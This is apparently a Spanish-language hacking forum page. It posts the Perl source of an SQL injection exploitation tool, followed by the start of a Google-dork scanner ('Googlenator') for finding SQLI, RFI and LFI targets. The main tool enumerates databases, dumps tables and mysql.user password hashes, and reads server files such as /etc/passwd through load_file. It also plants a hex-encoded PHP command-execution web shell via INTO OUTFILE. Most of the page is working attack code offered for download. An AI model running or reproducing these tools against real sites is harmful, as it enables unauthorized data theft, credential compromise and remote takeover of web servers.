/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');

use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

&head;
unless(@ARGV == 2) {
&menu;
} else {
&scan($ARGV[0],$ARVG[1]);
}
&finish;

sub menu {
print "[Page] : ";
chomp(my $page=<STDIN>);
print "\n[Bypass : -- /* %00] : ";
chomp(my $bypass = <STDIN>);
print "\n\n";
&scan($page,$bypass);
}

sub scan {
print "[Status] : Scanning.....\n";
$pass = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}
my ($gen,$save,$control) = &length($_[0],$_[1]);
if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
&menu_options($gen,$pass,$save);
} else {
print $control;
print "[Status] : Length columns not found\n\n";
<STDIN>;
&head;
&menu;
}
}

sub head {
system 'cls';
print qq(


 @      @@   @             
@@     @  @ @@             
 @ @@  @  @  @ @   @ @ @@@ 
 @ @   @  @  @@ @ @@@ @  @ 
 @@    @  @  @  @  @   @@@ 
 @ @   @  @  @  @  @  @  @ 
@@@ @   @@   @@@  @@@ @@@@@




);
}




sub copyright {
print "\n\n\n\n(C) Doddy Hackman 2010\n\n";
}


sub toma {
return $nave->request (GET $_[0])->content;
}


sub savefile {
open (SAVE,">>logs/webs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}


sub length {
my $rows  = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $patha = $1;
chomp $patha;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; 
$total.= ",".$rows;
$injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
if ($patha) {
savefile($save.".txt","[Full Path Discloure] : $patha");
}
$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}

sub ascii {
return join ',',unpack "U*",$_[0]; 
}

sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}

sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n\n[+] Searching information..\n\n"; 
my  ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[+] load_file permite ver los archivos\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; 
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}
}
}
}

sub menu_options {
print "[Target confirmed] : $_[0]\n";
print "[Bypass] : $_[1]\n\n";

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
print "[save] : /logs/webs/$save\n\n";
print "\n\n--== information_schema.tables ==--\n\n";
print "[1] : Show tables\n";
print "[2] : Show columns\n";
print "[3] : Show DBS\n";
print "[4] : Show tables with other DB\n";
print "[5] : Show columns with other DB\n";
print "\n\n--== mysql.user ==--\n\n";
print "[6] : Show users\n";
print "\n\n--== Others ==--\n\n";
print "[7] : Fuzzing tables\n";
print "[8] : Fuzzing columns\n";
print "[9] : Fuzzing files with load_file\n";
print "[10] : Dump\n";
print "[11] : Informacion of the server\n";
print "[12] : Create a shell with into outfile\n";
print "[13] : Show Log\n";
print "[14] : Change Target\n";
print "[15] : Exit\n";
print "\n\n[Option] : ";
chomp(my $opcion = <STDIN>);
if ($opcion eq "1") {
schematables($_[0],$_[1],$save);
&reload;	
}
elsif ($opcion eq "2") {
print "\n\n[Tabla] : ";
chomp(my $tabla = <STDIN>);
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($opcion eq "3") {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "4") {
print "\n\n[DAtabase] : ";
chomp(my $data =<STDIN>);
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($opcion eq "5"){
print "\n\n[DB] : ";
chomp(my $db =<STDIN>);
print "\n[Table] : ";
chomp(my $table =<STDIN>);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($opcion eq "6") {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "13") {
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($opcion eq "15") {
&finish;
}
elsif ($opcion eq "14") {
&head;
&menu;
}
elsif ($opcion eq "7") {
&tabfuzz($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "8") {
print "\n\n[Tabla] : ";
chomp(my $tab  = <STDIN>);
&colfuzz($_[0],$_[1],$tab,$save);
&reload;
}
elsif ($opcion eq "9") {
&load($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "10") {
print "\n\n[Table to dump] : ";
chomp(my $tabla = <STDIN>);
print "\n[Column 1] : ";
chomp(my $col1 = <STDIN>);
print "\n[Column 2] : ";
chomp(my $col2 = <STDIN>);
print "\n\n";
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($opcion eq "11") {
print "\n\n";
&details($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "12") {
print "\n\n[Full Path Discloure] : ";
chomp(my $path = <STDIN>);
&into($_[0],$_[1],$path,$save);
&reload;
}
else {
&reload;
}
}

sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "[+] Searching tables with schema\n\n";
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
my $resto = $1;
$total = $resto - 17; 
print "[+] Tables Length :  $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length :  $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}	 
}
sub reload {
print "\n\n[+] Finish\n\n";
<STDIN>;
&head;
&menu_options;
}


sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[Column $real] : $1\n"; 
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
} else {
print "[-] information_schema = ERROR\n";
}
}

sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
print "[+] Tables Length :  $1\n\n";
savefile($_[3].".txt","[+] Tables Length :  $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) { 
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
&reload;
}}}
} else {
print "\n[-] mysql.user = ERROR\n";
}}

sub tabfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[2].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/g) {
my $start = $1; my $end = $2;
print "\n\n[+] Searching tables.....\n\n";
for my $table(@buscar2) {
chomp $table;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
$code = toma($injection);
if ($code =~/ERTOR854/g) {
$count++; 
print "[Table Found] : $table\n";
savefile($_[2].".txt","[Table Found] : $table");
}}}
if ($count eq "0") { print "[-] Not found any table\n";
&reload;
}
}

sub colfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[3].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/) { 
my $start = $1; my $end = $2;
print "[+] Searching columns for the table $_[2]...\n\n";
savefile($_[3].".txt","[Table] : $_[2]");
for my $columns(@buscar1) {
chomp $columns;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
if ($code =~/ERTOR854/g) {
print "[Column] : $columns\n";
savefile($_[3].".txt","[Column Found] : $columns");
}}
} else {
print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;
}
}

sub load {
savefile($_[2].".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($_[1]);
if ($_[0] =~/(.*)hackman(.*)/g) {
print "\n[+] Searching files with load_file...\n\n\n";
my $start = $1; my $end = $2;
for my $file(@buscar3) {
chomp $file;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(".encode($file)."),char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass2);
if ($code =~/ERTOR854(.*)ERTOR854/g) {
print "[File Found] : $file\n";
print "\n[Source Start]\n\n";
print $1;
print "\n\n[Source End]\n\n";
savefile($_[2].".txt","[File Found] : $file");
savefile($_[2].".txt","\n[Source Start]\n");
savefile($_[2].".txt","$1");
savefile($_[2].".txt","\n[Source End]\n");
}}}}

sub dump {
savefile($_[5].".txt","\n");
print "\n";
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){ 
my $start = $1;
my $end = $2;
print "[+] Extracting values...\n\n";
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1; 
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) { 
chomp $limit;
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
print "[$_[1]] : $1   [$_[2]] : $2\n"; 
} else {
print "\n\n[+] Extracting Finish\n"; 
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}

sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}return $hex;}

sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}

sub finish {
&copyright;
<STDIN>;
exit(1);
}


sub into {
print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
my ($page,$bypass,$dir,$save) = @_;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) { 	
my $path1 = $1;
my $path2 = $path1;
$path2 =~s/$1//;
$dir =~s/$path1//ig;
$shell = $dir."/"."shell.php";
if ($page =~/(.*)hackman(.*)/ig) {
my  ($start,$end) = ($1,$2);
$code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
$code1 = toma("http://".$auth."/".$path2."/"."shell.php");
if ($code1=~/Mini Shell By Doddy/ig) {
print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a";
savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
} else {
print "[shell] : Not Found\n";
}
}
}
}

#blog : doddy-hackman.blogspot.com
#contact : lepuke[at]hotmail[Com] 
#The end

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/k0bra/

#346

Perl / [Perl] G00gl3nator By Doddy H

Julio 03, 2011, 09:45:53 PM

Bueno ,este es un scanner en su version grafica ,este programa puede scanear

SQLI
RFI
LFI

Full Source Discloure

Tambien pueden buscar en google string en google con , los resultados
son guardados en una carpeta que el programa instalar al ejecutarse

Código: perl


#!usr/bin/perl
#Googlenator (C) Doddy Hackman 2011

use Tk;
use Tk::ROText;
use Tk::FileSelect;
use URI::Split qw(uri_split);
use Cwd;
use WWW::Mechanize;

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}

my $nave = WWW::Mechanize->new(autocheck => 0);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

installer();

my $new = MainWindow->new(-background=>"black");

$new->title("Googlenator (C) Doddy Hackman 2011");
$new->geometry("780x530");
$new->resizable(0,0);

$d = $new->Frame(-relief=>"sunken",-bd=>1,-background=>"black",-foreground=>"cyan");
my $scanx = $d->Menubutton(-text=>"Scan",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
my $logsx = $d->Menubutton(-text=>"Logs",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
$d->pack(-side=>"top",-fill=>"x");

$scanx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadsql);
$scanx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadrfi);
$scanx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadlfi);
$scanx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfsd);

$logsx->command(-label=>"GoogleSearchs",-background=>"black",-foreground=>"cyan",-command=>\&loadgoogle);
$logsx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadfilesql);
$logsx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilerfi);
$logsx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilelfi);
$logsx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfilefsd);

my $box = $new->ROText(-background=>"black",-foreground=>"cyan",-width=> 104,-height=> 20)->place(-x =>20,-y=>60);
head();

$new->Label(-background=>"black",-foreground=>"cyan",-text=>"Google : ",-font=>"Impact")->place(-y=>"380",-x=>"20");

my $google = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"30",-text=>"www.google.com.ar")->place(-x=>"80",-y=>"385");

$new->Label(-background=>"black",-foreground=>"cyan",-text=>"Pages : ",-font=>"Impact")->place(-y=>"380",-x=>"300");

my $pages = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"5",-text=>"30")->place(-y=>"385",-x=>"354");

$new->Label(-background=>"black",-foreground=>"cyan",-font=>"Impact",-text=>"Dorks : ")->place(-y=>"380",-x=>"450");

my $dorks = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"40",-text=>"index.php+id")->place(-y=>"385",-x=>"505");

$new->Button(-text=>"Search in Google",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&googler)->place(-y=>"450");
$new->Button(-text=>"About",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&about)->place(-y=>"474");
$new->Button(-text=>"Exit",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&exitx)->place(-y=>"498");
	
MainLoop;

head();

sub googler {

my $google = $google->get;
my $pages = $pages->get;
my $dorks = $dorks->get;

head();

$box->insert("end","\t\t[+] Searching pages with string $dorks\n\n");

my @webas = google($google,$dorks,$pages);

$box->insert("end","\t\t[+] Cleaning\n\n");
$box->insert("end","\t\t[+] Webs Found ".int(@webas)."\n\n");

for(@webas) {
$new->update();
$box->insert("end","\t\t[Link] : ".$_."\n");
savefile($dorks.".txt",$_);
}

$box->insert("end","\n\t\t[+] All save in logs/search/".$dorks."\n");
$box->insert("end","\t\t[+] Finished\n\n");
	
}

